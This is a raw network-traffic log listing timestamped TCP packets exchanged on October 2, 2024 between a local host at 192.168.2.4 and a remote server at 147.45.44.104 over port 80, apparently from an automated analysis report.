Oct 2, 2024 09:41:04.978734016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978743076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978750944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978766918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978777885 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978785038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978800058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978811979 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978815079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978836060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978842020 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978862047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978878975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978890896 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978894949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978912115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978918076 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978929996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978948116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978957891 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978967905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.979752064 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.012773991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012795925 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012823105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012840986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012856960 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012873888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012891054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012907982 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012923956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012943029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012954950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.012959957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012978077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.012989044 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.012995958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.013006926 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.013015032 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.013032913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.013041973 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.013422012 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.064444065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064492941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064527988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064547062 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.064563990 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064599991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064632893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064666986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.064697981 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.064702034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065032005 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065213919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065234900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065263987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065280914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065290928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065298080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065315008 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065325022 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065331936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065357924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065359116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065377951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065395117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065408945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065429926 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065444946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065457106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065470934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065486908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065498114 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065502882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065522909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065529108 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065538883 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065556049 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065566063 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065572977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065583944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065589905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065607071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065615892 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065623045 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065650940 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065650940 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065669060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065689087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065709114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065726042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065736055 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065742970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065759897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065772057 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065820932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065838099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065849066 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065853119 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065869093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065886021 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065900087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065907001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065907955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.065926075 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.065973997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066000938 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066042900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066060066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066073895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066087961 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066091061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066106081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066117048 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066123962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066149950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066150904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066169024 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066194057 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066195011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066212893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066227913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066237926 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066243887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066261053 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066270113 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066303015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066318035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066329002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066334009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066349983 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066361904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066366911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066381931 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066392899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066397905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066423893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066468000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066483974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066498995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066509008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066517115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066534042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066544056 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066550016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066566944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066576958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066585064 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066612005 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066636086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066651106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066664934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066675901 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066682100 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066709995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066709995 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066725969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066742897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066754103 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066761017 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066787004 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066859007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066874981 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066890001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066900969 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066939116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066956043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066967964 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.066972017 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066989899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.066999912 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067004919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067020893 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067032099 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067037106 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067054033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067063093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067070007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067086935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067096949 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067106009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067133904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067313910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067331076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067346096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067358017 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067361116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067378998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067389011 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067405939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067409039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067423105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067436934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067451954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067467928 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067478895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067482948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067500114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067509890 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067517042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067533016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067548990 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067564011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.067574024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.067756891 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101357937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101418972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101475000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101514101 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101564884 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101598978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101603031 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101603031 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101635933 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101667881 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101701975 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101732969 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101732969 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101733923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101768970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101800919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101834059 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101865053 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101865053 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.101866961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101902962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.101938963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.102283001 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.102601051 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.153193951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153243065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153279066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153317928 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153352976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153382063 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.153382063 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.153387070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.153424025 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154134035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154196978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154196978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154205084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154269934 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154304028 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154340029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154361963 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154393911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154423952 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154432058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154484034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154519081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154550076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154582024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154582024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154582977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154638052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154670954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154705048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154736042 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154736042 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154736996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154777050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154833078 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154867887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154887915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154897928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.154901981 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154936075 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154968023 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.154992104 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155005932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155034065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155064106 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155067921 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155102015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155117989 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155138969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155172110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155191898 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155225039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155278921 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155299902 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155318022 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155352116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155374050 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155462027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155505896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155515909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155544996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155580997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155600071 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155616045 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155651093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155683994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155709982 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155709982 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155725956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155761003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155796051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155817986 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155829906 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155872107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155888081 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155905962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155942917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.155962944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.155975103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156008959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156029940 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156043053 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156076908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156095982 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156116009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156148911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156182051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156214952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156234980 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156250000 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156282902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156302929 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156317949 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156352043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156371117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156390905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156424046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156445980 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156459093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156493902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156527996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156558037 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156558037 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.156562090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.156595945 CEST	80	49734	147.45.44.104	192.168.2.4
